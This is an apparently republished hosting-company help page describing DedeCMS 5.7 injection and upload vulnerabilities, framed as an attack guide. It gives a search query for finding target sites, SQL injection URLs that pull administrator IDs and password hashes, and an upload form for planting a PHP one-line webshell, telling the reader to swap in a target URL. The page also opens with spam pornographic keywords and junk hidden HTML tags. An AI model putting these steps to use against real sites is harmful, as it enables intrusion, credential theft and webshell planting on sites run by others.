激情五月天婷婷,亚洲愉拍一区二区三区,日韩视频一区,a√天堂中文官网8

<ul id="buwfs"><strike id="buwfs"><strong id="buwfs"></strong></strike></ul>
    <output id="buwfs"></output>
  • <dfn id="buwfs"><source id="buwfs"></source></dfn>
      <dfn id="buwfs"><td id="buwfs"></td></dfn>
      <div id="buwfs"><small id="buwfs"></small></div>
      <dfn id="buwfs"><source id="buwfs"></source></dfn>
      1. <dfn id="buwfs"><td id="buwfs"></td></dfn>
        始創(chuàng)于2000年 股票代碼:831685
        咨詢熱線:0371-60135900 注冊有禮 登錄
        • 掛牌上市企業(yè)
        • 60秒人工響應(yīng)
        • 99.99%連通率
        • 7*24h人工
        • 故障100倍補(bǔ)償
        全部產(chǎn)品
        您的位置: 網(wǎng)站首頁 > 幫助中心>文章內(nèi)容

        dedecms5.7最新注入和上傳漏洞

        發(fā)布時(shí)間:  2012/7/9 18:17:00
          漏洞類型:注入漏洞、上傳漏洞

        漏洞描述:百度搜索關(guān)鍵字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,獲得使用DeDeCMS系統(tǒng)的網(wǎng)站。

        注入漏洞。首先訪問“/data/admin/ver.txt”頁面獲取系統(tǒng)最后升級時(shí)間,然后訪問“/member/ajax_membergroup.php?action=post&membergroup=1”頁面,

        然后訪問“/member/ajax_membergroup.php?action=post&membergroup=1”頁面,如圖說明存在該漏洞。

        然后寫上語句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理員id

        /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理員密碼

        得到的是19位的,去掉前三位和最后一位,得到管理員的16位MD5

        上傳漏洞。要求網(wǎng)站開啟新會員注冊功能,首先注冊新會員,無需通過郵件驗(yàn)證,

        只要登陸會員中心,然后訪問頁面鏈接

        “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

        說明通過“/plus/carbuyaction.php”已經(jīng)成功調(diào)用了上傳頁面“/dialog/select_soft_post”

        于是將Php一句話木馬擴(kuò)展名改為“rar”等,利用提交頁面upload1.htm

        <form action="=../dialog/select_soft_post]

        <[/url">http://www.webanqn.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

        enctype="multipart/form-data" name="form1">
        file:<input name="uploadfile" type="file" /><br>
        newname:<input name="newname" type="text" value="myfile.Php"/>
        < button class="button2" type="submit">提交</button><br><br>

         

        把url改成目標(biāo)url就行了。還有個全局變量提交,繞過注冊的可以去黑防2月刊上面看。


        本文出自:億恩科技【mszdt.com】

        服務(wù)器租用/服務(wù)器托管中國五強(qiáng)!虛擬主機(jī)域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]

      2. 您可能在找
      3. 億恩北京公司:
      4. 經(jīng)營性ICP/ISP證:京B2-20150015
      5. 億恩鄭州公司:
      6. 經(jīng)營性ICP/ISP/IDC證:豫B1.B2-20060070
      7. 億恩南昌公司:
      8. 經(jīng)營性ICP/ISP證:贛B2-20080012
      9. 服務(wù)器/云主機(jī) 24小時(shí)售后服務(wù)電話:0371-60135900
      10. 虛擬主機(jī)/智能建站 24小時(shí)售后服務(wù)電話:0371-60135900
      11. 專注服務(wù)器托管17年
        掃掃關(guān)注-微信公眾號
        0371-60135900
        Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權(quán)所有  地址:鄭州市高新區(qū)翠竹街1號總部企業(yè)基地億恩大廈  法律顧問:河南亞太人律師事務(wù)所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號
          0
         
         
         
         

        0371-60135900
        7*24小時(shí)客服服務(wù)熱線